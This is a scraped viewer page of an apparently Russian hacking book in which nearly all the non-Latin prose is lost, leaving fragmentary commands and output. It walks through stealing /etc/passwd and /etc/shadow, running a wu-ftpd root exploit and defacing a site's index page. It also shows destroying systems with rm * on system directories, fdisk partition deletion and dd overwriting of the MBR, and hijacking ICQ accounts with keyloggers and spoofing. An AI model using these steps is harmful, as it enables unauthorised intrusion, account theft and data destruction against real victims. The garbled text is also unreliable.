Levin M. Haking 1

Download Levin M. Haking 1

Post on 08-Apr-2018

219 views

Category:

Documents

0 download

Embed Size (px)

TRANSCRIPT

<ul><li><p>8/7/2019 Levin M. Haking 1</p><p> 1/112</p><p> :</p><p> 681.3 32.973.26018.2</p><p>363</p><p> ., 2006</p><p> ,2006</p><p> .363 : </p><p>. .: , 2006. 224 .</p><p> .</p><p> 681.3 32.973.26018.2</p><p> 2006</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 2/112</p><p> , .</p><p> , , , .</p><p> , </p><p> (, TCP/IP). .</p><p> ?</p><p> ! </p><p> .</p><p> :</p><p> Linux</p><p> RedHat </p><p> UNIX SlackWare </p><p> UNIX</p><p> FreeBSD , UNIX</p><p> : Linux BSD (FreeBSD,OpenBSD, NetBSD)? .</p><p> . </p><p>, :</p><p> ftp 21</p><p> telnet 23</p><p> smtp 25</p><p> http 80</p><p> pop3 110</p><p>3 4</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 3/112</p><p> .</p><p>, :FTP (21)</p><p>, FTP, , .</p><p> FTP? File Transfer Protocol( ). , FTP , 21 , , .</p><p>TELNET (23)</p><p> , ( ), .</p><p>telnet ? , (!) ( !) .</p><p>SMTP (25)</p><p>, , </p><p> ? , </p><p> . Simple Mail Transfer Protocol .</p><p>HTTP (80)</p><p>Hyper Text Transfer Protocol .</p><p>, , , Internet.</p><p> web, ( ) . , .</p><p> , ! , web .</p><p>POP3 (110)</p><p> MailAgent (, Microsoft Outlook).</p><p> () .</p><p>5 6</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 4/112</p><p> ? , </p><p> UNIX . ( ) UNIX.</p><p> Windows (MUST_DIE), (A, B, C,D) :</p><p>C:\MUST_DIE\die.com</p><p> UNIX /, ( CDROM) (,/cdrom).</p><p> . .</p><p>. </p><p> /etc. () /etc passwd .. /etc/passwd.</p><p> , , , </p><p> , .</p><p>, !</p><p>, IP.</p><p> :tracert ( UNIX traceroute)</p><p>w3.cnn.com</p><p> ( ) IP</p><p> (IP Internet. 195.55.55.55 ( 0255 .. 0255.0255.0255.0255).</p><p> ftp ( </p><p> IP). ? MSDOS PROMPT MSDOS.</p><p> ( ) login. Internet.</p><p> Password.</p><p>7 8</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 5/112</p><p> Internet.</p><p> ( , , ! w3.dos.net IIS</p><p>(Internet Information Server), !</p><p> .</p><p>:</p><p>Directory /home/usr/_ not</p><p>foundLogging in "/"</p><p> , , .</p><p> :</p><p>ftp&gt; ( ) get /etc/passwd</p><p> .? . , find MUST_DIE passwd (). , </p><p>ftp (.. MUST_DIE). , find.</p><p> , . , , , !</p><p> , </p><p>! : </p><p> , .</p><p> ?</p><p> IP . , , . , .</p><p> : ? , </p><p>9 10</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 6/112</p><p> Internet. TCP/IP (Transfer ControlProtocol/Internet Protocol) , </p><p> Internet. .</p><p>Internet, IP (, ppp10335.dialup.glasnet.ru). ( ) , . , </p><p> , IP:port ( , 195.34.34.30:21 , FTP zone.ru).</p><p> , , </p><p> 23 ( telnet) ( telnet ip:port. , 23). , . </p><p>/, . , </p><p> , , .</p><p> 23 , , </p><p> . . </p><p> ( ). 273275 , , , , </p><p> : </p><p>, Internet. , . . , .</p><p>11 12</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 7/112</p><p> ( 19). </p><p> , , . </p><p> , .</p><p> (Finger). </p><p> finger , , , .</p><p> , </p><p> ? 1 1024 (wellknown). , services. Windows </p><p>C:\_Windows\SERVICES\. NT C:\WINNT\SYSTEM32\DRIVERS\ETC\SERVICES. /etc/services/</p><p>( , ). , (WWW, mail,FTP, news, telnet). , SMTP </p><p> 25 ,POP3 110 , WWW 80 , FTP 21</p><p> , , </p><p> . ! , ( ) , . </p><p> , , , ( , </p><p> Internet !). </p><p>13 14</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 8/112</p><p> . </p><p> .</p><p> , ? </p><p> , . . , </p><p> sendmail ( wiz debug FTP, ). </p><p> , , .</p><p> Windows </p><p> . </p><p> , Internet. , .</p><p> . , , . . , ++, </p><p> (root) , !!! FTPBounce , , FTP( / / ) , </p><p> . ( ). , </p><p>15 16</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 9/112</p><p> FTP , </p><p> . ( ). , </p><p>( !).</p><p> , ( !), . , </p><p> : NT, VMS UNIX. UNIX BSD, AIX, SCI, Sun OS, Irix () . </p><p> , , NT, UNIX, Sun OS (, ). </p><p> , </p><p> , , .</p><p> . , ?</p><p> , </p><p>netstat a ( ) :</p><p>Active Connections</p><p>Proto Local Address</p><p>Foreign Address State</p><p>TCP localhost:1027</p><p>0.0.0.0:0 LISTENINGTCP localhost:135</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:135</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1026</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1026</p><p>localhost:1027 ESTABLISHED</p><p>TCP localhost:1027</p><p>localhost:1026 ESTABLISHED</p><p>TCP localhost:137</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:138</p><p>17 18</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 10/112</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:nbsession</p><p>0.0.0.0:0 LISTENING</p><p>UDP localhost:135 *:*UDP localhost:nbname *:*</p><p>UDP localhost:nbdatagram *:*</p><p> . , .</p><p> , Local Address () 135, 137, 138 nbsession ( 139 netstatan, , . </p><p> MicrosoftNetworking LAN ( ). Internet , www.uxx.com, , www.happyhacker.org. ( www.whitehouse.gov). netstat a :</p><p>Active Connections</p><p>Proto Local Address Foreign</p><p>Address State</p><p>TCP localhost:1027</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1350.0.0.0:0 LISTENING</p><p>TCP localhost:135</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:2508</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:25090.0.0.0:0 LISTENING</p><p>TCP localhost:2510</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:2511</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:2514</p><p>0.0.0.0:0 LISTENINGTCP localhost:1026</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:1026</p><p>localhost:1027 ESTABLISHED</p><p>TCP localhost:1027</p><p>localhost:1026 ESTABLISHEDTCP localhost:137</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:138</p><p>0.0.0.0:0 LISTENING</p><p>TCP localhost:139</p><p>0.0.0.0:0 LISTENING</p><p>19 20</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 11/112</p><p>TCP localhost:2508</p><p>zlliks.505.ORG:80 ESTABLISHED</p><p>TCP localhost:2509</p><p>zlliks.505.ORG:80 ESTABLISHEDTCP localhost:2510</p><p>zlliks.505.ORG:80 ESTABLISHED</p><p>TCP localhost:2511</p><p>zlliks.505.ORG:80 ESTABLISHED</p><p>TCP localhost:2514</p><p>whitehouse.gov:telnet ESTABLISHED</p><p> , . , , 4 zllinks.505.ORG 80 whitehouse.gov . , Internet.</p><p> www.happyhacker.org (zlliks.505.ORG). , 1024??? , , , . , </p><p>, </p><p> 1024 . ? , 2508 2511.</p><p> ? Internet () netstat r. :</p><p>Route Table</p><p>Active Routes:</p><p>Network Address Netmask Gateway</p><p>Address Interface Metric</p><p>0.0.0.0 0.0.0.0</p><p>198.59.999.200 198.59.999.200 1</p><p>127.0.0.0 255.0.0.0127.0.0.1 127.0.0.1</p><p>1</p><p>198.59.999.0 255.255.255.0</p><p>198.59.999.200 198.59.999.200 1</p><p>198.59.999.200 255.255.255.255</p><p>127.0.0.1 127.0.0.1</p><p>1</p><p>198.59.999.255 255.255.255.255</p><p>198.59.999.200 198.59.999.200 1</p><p>224.0.0.0 224.0.0.0</p><p>198.59.999.200 198.59.999.200 1</p><p>255.255.255.255 255.255.255.255</p><p>198.59.999.200 0.0.0.0</p><p>21 22</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 12/112</p><p>1</p><p>Active Connections</p><p>Proto Local Address</p><p>Foreign Address StateTCP lovelylady:1093</p><p>mack.foo66.com:smtp ESTABLISHED</p><p>Gateway Address Interface IP ( IP , ). ,</p><p> , 10 , , , ( ) , ( ).</p><p> , Internet . p: . ? . . </p><p> e</p><p>mail UUPC . online</p><p> offline . init init1 \UUPC. login password. . Ho , </p><p>. </p><p> usera , login:. </p><p> . </p><p> , Netscape, SLIP &amp; PPP, , </p><p>y , . , . transmit . , , Windows. </p><p>23 24</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 13/112</p><p>, : </p><p> .pwl. Windows . . , DES. Ho . , </p><p> .pwl , 1,2,3,4 , , .</p><p> ,</p><p> . , . . . , </p><p> . BBS, . ! Ha 100%. login, password. , .</p><p> ,</p><p> . yp ( ) </p><p>. .</p><p> login/passwd, </p><p> . root . Ho . , , . </p><p> UNIX:FreeBSD, BSDI, SCO open server, Linux., , NexStep, UnixWare, Solaris,Aix, HPUX, VAXORX5.12. , Xenix. Ho </p><p> , , AT&amp;T UNIX 1971 . UNIX:</p><p>25 26</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 14/112 </p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 15/112</p><p> (daemon) .</p><p> exploit:</p><p> ftp wuftp2.42; wuftp2.60 qpopper proftp . exploit </p><p> openSource ( ), ++.</p><p> UNIX. exploit ( ) UNIX wuftp2.42 ( root):</p><p>#gcc .</p><p>#./a.out </p><p> ( )</p><p> IP , offset , , </p><p>() ( </p><p> 5000 +5000 +100, .. : 5000 4900</p><p>4800 0 100 200 5000).</p><p> , . , , </p><p> (patch) , (bugs) .</p><p> , .</p><p> root?Root </p><p>. Root , root (superuser), , !</p><p> root? root (, , , ).</p><p>29 30</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 16/112</p><p> ? exploit. , </p><p> exploit. ? , C++, , , .</p><p> () exploit remote access ( ), ..</p><p> exploit ( , ) remoteaccess.</p><p> ?</p><p> , ( ), ?</p><p>1. (,).</p><p>2. .</p><p>3. , .</p><p> , . : /etc ( </p><p> ), ftpusers ( BSDI UNIX), default () root 21</p><p>(ftp) . joe ( ) root ftp.</p><p>? root #, (Ctrl+k, </p><p>x).</p><p> ( root):</p><p>#joe /etc/ftpusers</p><p> root #, Ctrl+k, x.</p><p>, , ( ?).</p><p>, root , root </p><p> , ( ) , !</p><p> :</p><p>#ftp ip_address or host_name</p><p>31 32</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 17/112</p><p>login: root</p><p>password: !</p><p> ! </p><p>root ! ( , )</p><p> ? ! exploit! </p><p> :</p><p>login incorrect</p><p> 1 1.000.000 ( ), , () .</p><p> exploit( , root). :</p><p>#passwd</p><p>:</p><p>New unix passwd: </p><p>( ) 12345</p><p>:</p><p>Unix password too weak, please</p><p>retype password:</p><p> ?</p><p> , UNIX MUST_DIE!</p><p> : Abc04k9834z </p><p>? !</p><p>, , ! , </p><p> ! , () ZRHEN.</p><p> 12345 :</p><p>Retype password: </p><p>12345</p><p>, ! FTP.</p><p>#ftp</p><p>ftp&gt;open ip_address or host_name</p><p>( , </p><p>33 34</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 18/112</p><p> , )</p><p>login: root</p><p>password: 12345</p><p> ! ( , ? WWW !)</p><p> ftp bye:</p><p>ftp&gt;bye</p><p> .</p><p> ftp, ?</p><p> !</p><p> telnet ( 23), .</p><p> exploit </p><p> , :#telnet 127.0.0.1 80</p><p>127.0.0.1 loopback .. ip; 80 HTTP (Hyper</p><p>Text Transfer Protocol) , , :</p><p>we hack you</p><p> , ( , ?).</p><p>, , .. . , !</p><p> ?</p><p> !</p><p> ?</p><p> () </p><p>: , apache ( web). :</p><p>#which apache</p><p>:</p><p>/usr/sbin/apachectl</p><p>35 36</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 19/112</p><p>/usr/local/sbin/apachectl</p><p> , , , , DocumentRoot(httpd.conf). :</p><p>/usr/etc/apache</p><p>/usr/local/etc/apache</p><p> ( ) apache DocumentRott(home_dir) :</p><p>/www</p><p>/home/www</p><p>/usr/local/www</p><p>:</p><p>#cd home_dir home_dir www. index.htm index.html. ?</p><p>:</p><p>#ls full | more</p><p> (www). :</p><p>#rm index.htm (index.html)</p><p> .</p><p>:</p><p>#joe index.htm (index.html)</p><p> ( joe) :</p><p>This site hacked by Vasya</p><p> Ctrl+k, x.</p><p> joe .</p><p> ! UNIX</p><p>, . , Internet:</p><p> Ftpd (ftp daemon) port 21 Telnetd (telnet daemon) port 23 Smtpd (smtp daemon) port 25 Httpd (http daemon) port 80 Pop3d (pop3 daemon) port 110</p><p>37 38</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 20/112</p><p> . ( roota) :</p><p>#killall httpd</p><p> web .</p><p>#killall ftpd</p><p> ftp .</p><p>, :</p><p> ( roota):</p><p>#httpd start ( Linux)</p><p>#apachectl restart ( FreeBSD </p><p> web </p><p>apache)</p><p> ftpd:</p><p>#ftpd ( !)</p><p> . . , ( roota):</p><p>#cd /</p><p>#rm * ( (!) </p><p> )</p><p>#cd /boot</p><p>#rm *</p><p>#cd /bin</p><p>#rm *#cd /sbin</p><p>#rm *</p><p>#cd /usr/bin</p><p>#rm *</p><p>#cd /usr/sbin</p><p>#rm *</p><p> , ( /etc, ).</p><p> , .. rm</p><p> : /bin /sbin /usr/bin /usr/sbin , </p><p> ( rm ). :</p><p>#which rm</p><p>39 40</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 21/112</p><p> , rm. .</p><p> ?</p><p> :</p><p>#cd /etc</p><p>#rm *</p><p> !</p><p> :</p><p>#reboot</p><p> ( ) </p><p> , 100%</p><p> ? ( roota):</p><p>#fdisk</p><p> p ( . (, 4), :</p><p>d (enter), 4 (enter)</p><p>d (enter), 3 (enter)</p><p>d (enter), 2 (enter)</p><p>d (enter), 1 (enter)</p><p> w nter.</p><p>! !( !)</p><p> UNIX dd, ( )., . SlackWare:</p><p> :hda1 slack ; hda2 dos ; hdc2</p><p> slack</p><p> ( , DOS, , MBR (Master Boot Record) </p><p> hdc2 (SlackWare). UNIX ? ! ):</p><p>dd /dev/hda /dev/hdc 0 512</p><p> :</p><p> 512 . 512 ?Master Boot Record (MBR). </p><p>41 42</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 22/112</p><p> 512 ( )</p><p> ???</p><p> dd () hda hdc!</p><p> hdc!</p><p> , Ctrl+, dd. dd 20 </p><p> 8 , Internet 2 </p><p> : dd fdisk.</p><p> , ( ).</p><p>99% </p><p> (), () ! ( </p><p> () .</p><p> () ( portscanner):</p><p>#portscanner 55.55.55.55 1 1024</p><p> 55.55.55.55 IP ; 1 </p><p> ;1024 .</p><p> ( n ) ( ):</p><p>21</p><p>2225</p><p>80</p><p>110</p><p> :</p><p>43 44</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 23/112</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 24/112</p><p> Count.dat .</p><p>2. : (, ):</p><p> Count.cgi 755. ..#chmod count.cgi 755</p><p> Count.cgi 777. ..#chmod count.dat 777</p><p> telnet , ftp , ftp, chmod ftp.</p><p> count.cgi:</p><p>#!/usr/bin/perl</p><p>print "Contenttype: text/html\n\n";</p><p>open (file,"count.dat);</p><p>@dat=;</p><p>close (file);</p><p>$dat[0]++;</p><p>open (file,"&gt;count.dat");</p><p>print "$dat[0]\n";</p><p>close (file);</p><p>print " $dat[0]\n";</p><p> count.dat ( 5).</p><p> ! , count.cgi 1.</p><p> CGI </p><p> ( ) .. CGI ! ( ,.. , ), : .</p><p> ( , )</p><p> ( email ). email :</p><p>cat /etc/passwd</p><p>47 48</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 25/112</p><p>cat /etc/master.passwd</p><p>cat /etc/shadow</p><p> (). , , .</p><p> :</p><p>Root:fdkjhgSFDgf:</p><p> ( john the ripper) .: </p><p> .</p><p> , .</p><p> ? , () () .</p><p> , </p><p>, , , .</p><p> , () , () .</p><p> ? () .core.</p><p> ? , , , , .</p><p> , realnetworks ( realaudio/realvideo). , </p><p> UIN: Bugs, Crack </p><p>Social Ingineering</p><p> : </p><p> , 49 50</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 26/112</p><p>UIN , </p><p> , . , .</p><p> : Internet </p><p> , . . C:\ . ICQ. UIN 20xxxx 80xxxxx. C:\Program Files\ICQ\UIN number.uin , , e</p><p>mail . , keyboard sniffer , .</p><p>ICQ Low, Medium High. </p><p> . , </p><p> , ICQ. ( , ). UIN , , , reboot, , </p><p>ICQ , keyboard sniffer . .</p><p> , </p><p>: , sniffer .</p><p> , ? , </p><p> ?</p><p> , </p><p>, UIN 51 52</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 27/112</p><p>http://www.icq.com/password/ ICQ</p><p> email .</p><p> UIN </p><p> email.</p><p> . , POP3Password Crack </p><p> . , . , hotmail.com , email , .</p><p> : ICQ 777777.</p><p> UIN! email, vasya@something.com. UIN , 2 . sometihg.com email , . , email </p><p> 777777. , </p><p> : email .</p><p> (: email , web ), web. </p><p>53 54</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 28/112</p><p> vasya@something.com? , </p><p> ( email ) vasya@something.com. . , : </p><p> , . . , , . , 80% , , </p><p> . </p><p> . UIN , email .</p><p> , </p><p> , ICQ 8 . Windows UIN . </p><p>Linux, , , password, ( , </p><p> root ).</p><p> Linux ICQ , UIN </p><p>55 56</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 29/112</p><p> 9, . ?</p><p> UINa. Linux ICQ , .</p><p> ICQ , </p><p>: ICQ email?</p><p>: , ICQ </p><p> ICQhijeck. IP, UINa ICQhijeck spoofed , , .</p><p> .</p><p>, .</p><p>: , . ICQ?</p><p>: . , , ICQsniff , ICQ . , ,</p><p>, . , , , , , , , .</p><p>: ICQhijeck,ICQsniff, keyboard sniffer, TCP/UDP sniffer </p><p>57 58</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 30/112</p><p> , ?</p><p>: </p><p>Private Bug, . , , ICQ, .</p><p> tools ? , , . .</p><p> . , </p><p> , , www.yahoo.com. .</p><p> , </p><p> , UIN ,</p><p> ICQ.</p><p>, , , ICQ </p><p> .</p><p> , ICQ , Windows. ,</p><p> www.icq.com ICQ, . , .</p><p> . web .</p><p> free emeil, freewebhosting . , email, . </p><p>59 60</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 31/112</p><p> , , , email </p><p> ICQ .</p><p> , , . </p><p> . </p><p> Internet , , , </p><p>. , </p><p> ICQ , </p><p>. , ICQ ? , </p><p>Internet</p><p> .</p><p> , Nuke 139, http://www.microsoft.com .</p><p> Internet , , Proxy , , http://www.gin.ru. </p><p>:http://www.teamcti.com/pview/PrcView.zip, , </p><p> 61 62</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 32/112</p><p> : RUN Windows 95/98 </p><p> : regedit Windows(For Lamers). HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. , , Internet ! , !</p><p> , sharin ssl</p><p>, cgi , .</p><p> ()</p><p> ( </p><p>) :</p><p>1. </p><p> , , C++, Visual C++, Delphi, , 16 32 </p><p>( Windows95/98)</p><p>2. , . , . , , .</p><p> 1</p><p> !!! !!! ? , , 2</p><p>, http://www.microsoft.com.</p><p> :</p><p>1. 1632 :</p><p>63 64</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 33/112</p></li><li><p>8/7/2019 Levin M. Haking 1</p><p> 34/112</p><p> . </p><p> . . , !!! NeoLite,</p><p> :http://www.neoworx.com. .</p><p>2. , , , !!! ! 2 1!</p><p> Back</p><p>Orifice</p><p> BO 4</p><p> . , 4 .:</p><p>BoServ.exe</p><p> .